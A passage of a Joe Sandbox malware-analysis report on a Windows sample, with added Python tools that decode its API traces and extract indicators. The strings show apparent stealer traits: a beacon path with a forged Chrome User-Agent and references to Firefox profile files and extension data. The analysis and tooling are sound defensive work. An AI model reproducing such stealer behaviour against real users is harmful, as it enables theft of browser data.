• std::_Lockit::~_Lockit.LIBCPMT ref: 0021E444
• Concurrency::cancel_current_task.LIBCPMT ref: 0021E451
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registercodecvt
• String ID:
• API String ID: 878568432-0
• Opcode ID: f313292dfd397670ee9213fc82e90359afc3365849f867cee631818de9461c50
• Instruction ID: 4654047cfdd8c31d7acdc72490fe82d030be596959df98b242bcbd29c40c79c7
• Opcode Fuzzy Hash: f313292dfd397670ee9213fc82e90359afc3365849f867cee631818de9461c50
• Instruction Fuzzy Hash: C51133719202299FCB04EF64D8466EEBBF5EF54310F24041EE802A7381EBB09E51CF82
APIs
• GetLastError.KERNEL32(?,?,002223C1,0022051C,0021D594), ref: 002223D8
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002223E6
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002223FF
• SetLastError.KERNEL32(00000000,002223C1,0022051C,0021D594), ref: 00222451
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: a877230e553a44cb2a48f54f3523ac0ff5dfa02d4f87671951f0ce622250dc27
• Instruction ID: 9e25073738e6cbd3d2a15a5cd56d362e1c21d879e3a41510b1bed971f4687ca8
• Opcode Fuzzy Hash: a877230e553a44cb2a48f54f3523ac0ff5dfa02d4f87671951f0ce622250dc27
• Instruction Fuzzy Hash: 6E01B532139332FE96187BF4BC4D6272768EB127753700229F520551E1EFA74D75D588
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00225216
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0022531D
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00225330
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: OQ"$OQ"
• API String ID: 885266447-1907008189
• Opcode ID: 87ba73a9127f39d7e3dc710e9ec0d2296fe9cd6937158d3c1ea991b18849cd84
• Instruction ID: d74206a6a9fa9416c43f9573a696ada162735a3336f78440f66bc065dcf3328b
• Opcode Fuzzy Hash: 87ba73a9127f39d7e3dc710e9ec0d2296fe9cd6937158d3c1ea991b18849cd84
• Instruction Fuzzy Hash: 14517C71A10629EFCF14CF98D881AAEBBB2EB49350F14C159E815A7291D370AE21DB60
APIs
• __EH_prolog3.LIBCMT ref: 0020CBAD
  • Part of subcall function 0020DF81: __EH_prolog3.LIBCMT ref: 0020DF88
  • Part of subcall function 0020FC37: __EH_prolog3.LIBCMT ref: 0020FC3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3
• String ID: '$; expected $syntax error $unexpected
• API String ID: 431132790-3930586041
• Opcode ID: aadda81f21d7cad1308c4d4f96de31a5bdc2a1224e2671bf4d38bc58ae2310b4
• Instruction ID: 8a7bed147888e05b17882e7ceae581f98556214eb20d575990a07190e72f9701
• Opcode Fuzzy Hash: aadda81f21d7cad1308c4d4f96de31a5bdc2a1224e2671bf4d38bc58ae2310b4
• Instruction Fuzzy Hash: 02317EB0D24309EBDF08EFA4C596AAEBB75AF14300F50416EE405A72C2DB745A55CF91
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,07CD655B,00000000,?,00000000,00245794,000000FF,?,0022C15C,?,?,0022C130,00000000), ref: 0022C1B5
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0022C1C7
• FreeLibrary.KERNEL32(00000000,?,00000000,00245794,000000FF,?,0022C15C,?,?,0022C130,00000000), ref: 0022C1E9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 6425fc3b78b7ef95ef906f4ebfae4845cfb8f4d5cf155e0ba5c04886c85c84d6
• Instruction ID: 91cbcfdaf5b9a1004e3657b6e6ba39b60b645c0ac93631cdf573179808f7a7ae
• Opcode Fuzzy Hash: 6425fc3b78b7ef95ef906f4ebfae4845cfb8f4d5cf155e0ba5c04886c85c84d6
• Instruction Fuzzy Hash: 3601D675910625FFDB158F90EC0EFAEBBB8FB06B11F000525F819E22D1DBB59910CA90
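The API lines in these function blocks are the sandbox's record of the argument slots at each call site, and two things about them slow down reading. The values are bare 8-digit hex with no symbolic names, and a line often shows more slots than the API takes: the second CreateFileA in the CreateFileA/WriteFile block earlier on this page lists fifteen values for a seven-parameter function, and the trailing values repeat the first CreateFileA's arguments, which is to say they are whatever sat deeper on the stack, not parameters of the call. A `?` marks a slot the analysis did not resolve to a constant. The decoder below is an added example for working with this report, not Joe Sandbox code and not part of the report itself. It parses lines in this format, cuts each call at its documented 32-bit stdcall arity (the sample is a 32-bit PE), names the Win32 constants from the SDK headers, and treats non-hex tokens such as mscoree.dll and CorExitProcess in the block just above as string arguments. Its inputs are the lines copied from those two blocks; the arity table covers only the APIs that appear in them.

```python
"""Decode Joe Sandbox 'APIs' trace lines into named Win32 calls.
Added example for reading this report, not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import Optional

# Sample input copied from two function blocks in this report.
FILE_TRACE = """\
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00217644
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00217679
SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000), ref: 0021768C
WriteFile.KERNEL32(00000000,?,00000001,?,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000), ref: 002176A3
CloseHandle.KERNEL32(00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 002176AA
CloseHandle.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 002176B9
"""
EXIT_TRACE = """\
GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,07CD655B,00000000,?,00000000,00245794,000000FF,?,0022C15C,?,?,0022C130,00000000), ref: 0022C1B5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0022C1C7
FreeLibrary.KERNEL32(00000000,?,00000000,00245794,000000FF,?,0022C15C,?,?,0022C130,00000000), ref: 0022C1E9
"""

# Documented parameter counts. The sample is a 32-bit PE, so these are stdcall and every
# argument is a stack slot; slots printed past the arity are leftovers from earlier calls.
ARITY = {"CreateFileA": 7, "SetFilePointer": 4, "WriteFile": 5, "CloseHandle": 1,
         "GetModuleHandleExW": 3, "GetProcAddress": 2, "FreeLibrary": 1}

# Win32 constants from winnt.h / fileapi.h.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}

LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int           # call-site address in the dumped image
    args: list         # exactly ARITY[api] entries: int, str, or None for an unresolved '?'
    stack_spill: int   # slots the trace printed beyond the documented arity


def parse_token(tok: str):
    """'?' is an unresolved slot, 8 hex digits is a DWORD, anything else is a string argument."""
    if tok == "?":
        return None
    if HEX8_RE.match(tok):
        return int(tok, 16)
    return tok


def parse_line(line: str) -> ApiCall:
    m = LINE_RE.match(line.strip())
    if m is None:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    raw = m["args"].split(",")
    arity = ARITY.get(m["api"], len(raw))   # unknown API: keep every slot
    args = [parse_token(t) for t in raw[:arity]]
    return ApiCall(m["api"], m["module"], int(m["ref"], 16), args, len(raw) - arity)


def parse_trace(text: str) -> list:
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def flag_names(value: Optional[int], table: dict) -> str:
    """Render a bitmask as OR-ed constant names, keeping undocumented bits as hex."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"


def fmt(value, table: Optional[dict] = None) -> str:
    if value is None:
        return "?"
    if isinstance(value, str):
        return repr(value)
    return table.get(value, hex(value)) if table else hex(value)


def describe(call: ApiCall) -> str:
    a = call.args
    if call.api == "CreateFileA":
        return (f"CreateFileA(access={flag_names(a[1], ACCESS)}, share={flag_names(a[2], SHARE)}, "
                f"disposition={fmt(a[4], DISPOSITION)}, attrs={fmt(a[5])})")
    if call.api == "SetFilePointer":
        return f"SetFilePointer(distance={fmt(a[1])}, method={fmt(a[3], MOVE_METHOD)})"
    if call.api == "WriteFile":
        return f"WriteFile(bytes={fmt(a[2])})"
    return f"{call.api}({', '.join(fmt(v) for v in a)})"


if __name__ == "__main__":
    for call in parse_trace(FILE_TRACE) + parse_trace(EXIT_TRACE):
        print(f"{call.ref:08X}  {describe(call)}  [+{call.stack_spill} spilled slots]")
```

Run on the first block, the decoder reads the sequence as: create or truncate a file for GENERIC_WRITE with CREATE_ALWAYS, open the same kind of path again with OPEN_EXISTING, seek from FILE_BEGIN by an unresolved distance, write one byte, and close both handles. The path is `?` in every line, so the report alone does not say which file is touched; that has to come from the dynamic file-system events elsewhere in the report.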
APIs
• __alloca_probe_16.LIBCMT ref: 0023530A
• __alloca_probe_16.LIBCMT ref: 002353D3
• __freea.LIBCMT ref: 0023543A
  • Part of subcall function 0023188C: RtlAllocateHeap.NTDLL(00000000,?,?,?,002014D8,00000000,?), ref: 002318BE
• __freea.LIBCMT ref: 0023544D
• __freea.LIBCMT ref: 0023545A
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
• Opcode ID: 31b5650e1311b702b5777cad020ce7d806a9dbc060eb475b76f99f5e945617ab
• Instruction ID: 61f51eeb516ea6581093bfcb477128af792cab49e1f125a7b83d4a54f3861cbc
• Opcode Fuzzy Hash: 31b5650e1311b702b5777cad020ce7d806a9dbc060eb475b76f99f5e945617ab
• Instruction Fuzzy Hash: C451B3F2620626AFEB245EA4CD45EBB76A9EF44751F154428FE0CD6111E770DCB0CAA0
APIs
• __EH_prolog3_GS.LIBCMT ref: 0021B63E
• std::_Lockit::_Lockit.LIBCPMT ref: 0021B64B
  • Part of subcall function 0021A4EA: __EH_prolog3_GS.LIBCMT ref: 0021A4F1
  • Part of subcall function 0021A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0021A502
  • Part of subcall function 0021A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0021A524
• std::_Facet_Register.LIBCPMT ref: 0021B69E
• std::_Lockit::~_Lockit.LIBCPMT ref: 0021B6C8
• Concurrency::cancel_current_task.LIBCPMT ref: 0021B6D5
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
• API String ID: 2687776920-0
• Opcode ID: f31b8ac27a845d60565e579e759872fdce265b1f296a494c8957dbb4e2bafa34
• Instruction ID: 5ce1d2ea340ef412a2417eed0f8f5d31918ed7ee56ff8e1f9790bceddf3c1d00
• Opcode Fuzzy Hash: f31b8ac27a845d60565e579e759872fdce265b1f296a494c8957dbb4e2bafa34
• Instruction Fuzzy Hash: 7021F13192120ACFCB16EF78D4916EEB7F5AF64320F20451EE455E72A1DB748DA18F80
APIs
• __EH_prolog3_GS.LIBCMT ref: 0021C3F9
• std::_Lockit::_Lockit.LIBCPMT ref: 0021C406
  • Part of subcall function 0021A4EA: __EH_prolog3_GS.LIBCMT ref: 0021A4F1
  • Part of subcall function 0021A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0021A502
  • Part of subcall function 0021A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0021A524
• std::_Facet_Register.LIBCPMT ref: 0021C459
• std::_Lockit::~_Lockit.LIBCPMT ref: 0021C483
• Concurrency::cancel_current_task.LIBCPMT ref: 0021C490
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
• API String ID: 2687776920-0
• Opcode ID: 4eb7157c2f18773c515694c01d459b04f61893c2651f5910dc44a362611c9a5b
• Instruction ID: 68fa4b5c29b8517e7b445baec38453e4c5970b6a5d07033b64665c927c98adc1
• Opcode Fuzzy Hash: 4eb7157c2f18773c515694c01d459b04f61893c2651f5910dc44a362611c9a5b
• Instruction Fuzzy Hash: 8711E031D65219CBCB05EFA494956FEB7F5AF68310F60001AE411A7291CB748E928F96
APIs
• __EH_prolog3.LIBCMT ref: 0021DE2B
• std::_Lockit::_Lockit.LIBCPMT ref: 0021DE36
• std::_Lockit::~_Lockit.LIBCPMT ref: 0021DEA4
  • Part of subcall function 0021DF87: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0021DF9F
• std::locale::_Setgloballocale.LIBCPMT ref: 0021DE51
• _Yarn.LIBCPMT ref: 0021DE67
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
• String ID:
• API String ID: 1088826258-0
• Opcode ID: 6a5630e910d7e62a9a2df5ad3f36b0625ec5d0d3707d73e784d9884a9200e4df
• Instruction ID: 16a0dba255bef1ff6ea64a6f70084e4f3c1d0137165387bfbc6df0ef618d5673
• Opcode Fuzzy Hash: 6a5630e910d7e62a9a2df5ad3f36b0625ec5d0d3707d73e784d9884a9200e4df
• Instruction Fuzzy Hash: 8A01F775A10211DBCB05EF20E8495BD77B5BFA1741B19011AE8065B382CF749E62CFC6
APIs
• __EH_prolog3_GS.LIBCMT ref: 002095BC
  • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
  • Part of subcall function 0020B4BA: __EH_prolog3.LIBCMT ref: 0020B4C1
  • Part of subcall function 0020B64E: __EH_prolog3.LIBCMT ref: 0020B655
  • Part of subcall function 00209983: __EH_prolog3_GS.LIBCMT ref: 0020998D
  • Part of subcall function 00206B3E: __EH_prolog3_GS.LIBCMT ref: 00206B48
  • Part of subcall function 00206B3E: lstrlenA.KERNEL32(?,?), ref: 00206C2D
  • Part of subcall function 00206B3E: GetProcessHeap.KERNEL32 ref: 00206C6A
  • Part of subcall function 0020B51E: __EH_prolog3.LIBCMT ref: 0020B525
  • Part of subcall function 0020B614: __EH_prolog3.LIBCMT ref: 0020B61B
• Sleep.KERNEL32(00000BB8), ref: 0020990F
  • Part of subcall function 00208D6A: __EH_prolog3_GS.LIBCMT ref: 00208D74
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3$H_prolog3_$HeapProcessSleeplstrlen
• String ID: /Up/b$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
• API String ID: 3276473106-2390619756
• Opcode ID: b3ea1ea0551af013f7ba876686765cbfc427b51f873230624648a7208d55ff1d
• Instruction ID: 12f629c46b87c6f996b10a1220bd1d041a34a5b79ea60b62d5b4d4eb639003d5
• Opcode Fuzzy Hash: b3ea1ea0551af013f7ba876686765cbfc427b51f873230624648a7208d55ff1d
• Instruction Fuzzy Hash: BEA1DD319203589BDB19EB60C855AEDBB75AF46310F5481AAE40AA32D3DF305FA9CF50
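The function block above is the one worth pulling out of this report for pivoting: it calls Sleep(0xBB8), i.e. a 3000 ms delay, and references the request path "/Up/b" together with a browser User-Agent whose tokens do not match any real Chrome build (Chrome has shipped the frozen AppleWebKit/537.36 and Safari/537.36 tokens since 2013, while this string pairs Chrome/50 with AppleWebKit/600.48 and Safari/603). The following is an added example, not code from Joe Sandbox or its IDA plugin: it parses function blocks in the text layout shown on this page into records, converts Sleep arguments to milliseconds, extracts the path and User-Agent strings as network indicators, and applies the Chrome-token consistency check as a detection heuristic. The sample input is a constructed excerpt of two blocks from this report; the regular expressions assume the "• " bullet layout and eight-digit hex addresses seen here, and the User-Agent rule is an assumption of this example, not a claim made by the report.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: two function blocks in the shape of the Joe Sandbox
# IDA-plugin output on this page (padding and link residue removed).
SAMPLE_REPORT = """\
APIs
• __EH_prolog3_GS.LIBCMT ref: 002095BC
  • Part of subcall function 00206B3E: lstrlenA.KERNEL32(?,?), ref: 00206C2D
  • Part of subcall function 00206B3E: GetProcessHeap.KERNEL32 ref: 00206C6A
• Sleep.KERNEL32(00000BB8), ref: 0020990F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3$H_prolog3_$HeapProcessSleeplstrlen
• String ID: /Up/b$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
• API String ID: 3276473106-2390619756
• Opcode ID: b3ea1ea0551af013f7ba876686765cbfc427b51f873230624648a7208d55ff1d
• Instruction Fuzzy Hash: BEA1DD319203589BDB19EB60C855AEDBB75AF46310F5481AAE40AA32D3DF305FA9CF50
APIs
• __alloca_probe_16.LIBCMT ref: 0023530A
• __freea.LIBCMT ref: 0023543A
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, the
# API name (may contain "::" and "~"), optional "(args)", then "ref: XXXXXXXX".
API_LINE = re.compile(
    r"^\s*• (?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<api>[^\s(]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
KV_LINE = re.compile(r"^\s*• (?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    api: str
    args: List[str]
    ref: str
    caller: Optional[str]  # set when the call happens inside a subcall


@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)  # split "String ID" on "$"
    meta: dict = field(default_factory=dict)         # other "key: value" bullets


def parse_report(text: str) -> List[FunctionBlock]:
    """Split the plugin output into per-function records; "APIs" starts a block."""
    blocks, current, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            section = "apis"
            continue
        if current is None:
            continue
        if stripped in SECTION_HEADERS:
            section = stripped
            continue
        if section == "apis":
            m = API_LINE.match(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                current.apis.append(ApiCall(m.group("api"), args, m.group("ref"), m.group("caller")))
            continue
        m = KV_LINE.match(line)
        if m:
            key, val = m.group("key"), m.group("val")
            if key == "String ID":
                current.strings = [s for s in val.split("$") if s]
            else:
                current.meta[key] = val
    return blocks


def sleep_calls_ms(block: FunctionBlock) -> List[int]:
    """Sleep's first argument is a DWORD of milliseconds; 00000BB8 is 3000 ms."""
    return [int(c.args[0], 16) for c in block.apis
            if c.api == "Sleep.KERNEL32" and c.args and re.fullmatch(r"[0-9A-Fa-f]+", c.args[0])]


def network_indicators(blocks: List[FunctionBlock]):
    """Return (kind, value) pairs for strings that look like URL paths or User-Agents."""
    found = []
    for b in blocks:
        for s in b.strings:
            if s.startswith("/"):
                found.append(("path", s))
            elif s.startswith("Mozilla/"):
                found.append(("user_agent", s))
    return found


def chrome_ua_inconsistent(ua: str) -> bool:
    """Heuristic (assumption of this example): a UA claiming Chrome must carry the
    frozen AppleWebKit/537.36 and Safari/537.36 tokens; anything else is an imitation."""
    if "Chrome/" not in ua:
        return False
    return not ("AppleWebKit/537.36" in ua and "Safari/537.36" in ua)


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_REPORT)
    for kind, value in network_indicators(parsed):
        flag = " (inconsistent Chrome tokens)" if kind == "user_agent" and chrome_ua_inconsistent(value) else ""
        print(f"{kind}: {value}{flag}")
    print("sleep ms:", sleep_calls_ms(parsed[0]))
```

The Opcode ID, Instruction ID and API String ID values the parser keeps in `meta` are the fields the report's "Similarity" section is built on; collecting them across reports is how you pivot from this sample to other builds sharing the same beaconing routine even when the User-Agent or path changes.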
APIs
• __EH_prolog3_GS.LIBCMT ref: 00207FAD
  • Part of subcall function 0020B4BA: __EH_prolog3.LIBCMT ref: 0020B4C1
  • Part of subcall function 00207DEC: __EH_prolog3_GS.LIBCMT ref: 00207DF3
  • Part of subcall function 00207DEC: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00207FEA), ref: 00207E40
  • Part of subcall function 00207DEC: HeapFree.KERNEL32(00000000,?,?,?,?,?,00207FEA), ref: 00207E47
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_Heap$FreeH_prolog3Process
• String ID: \Ext\$\prefs.js$\storage\default\
• API String ID: 4110124055-721971596
• Opcode ID: c1a3f0c1985c4b387e46c9602fec31a0a6fd31d8bdaffb365c8fa7dfc104342b
• Instruction ID: f0d219b8109405ae28f82e62605ab29580626919a137fcbc9decce28d3e4c0af
• Opcode Fuzzy Hash: c1a3f0c1985c4b387e46c9602fec31a0a6fd31d8bdaffb365c8fa7dfc104342b
• Instruction Fuzzy Hash: 93918A30D24388AADB15EBA4C956BEDBBB0AF15300F8040A9E545A71D3DF741F99CF52
APIs
• __EH_prolog3_GS.LIBCMT ref: 00207DF3
  • Part of subcall function 0021AE24: __EH_prolog3_GS.LIBCMT ref: 0021AE2E
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00207FEA), ref: 00207E40
• HeapFree.KERNEL32(00000000,?,?,?,?,?,00207FEA), ref: 00207E47
  • Part of subcall function 0020A6BD: __EH_prolog3.LIBCMT ref: 0020A6C4
Strings
• user_pref("extensions.webextensions.uuids", ", xrefs: 00207E5D
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
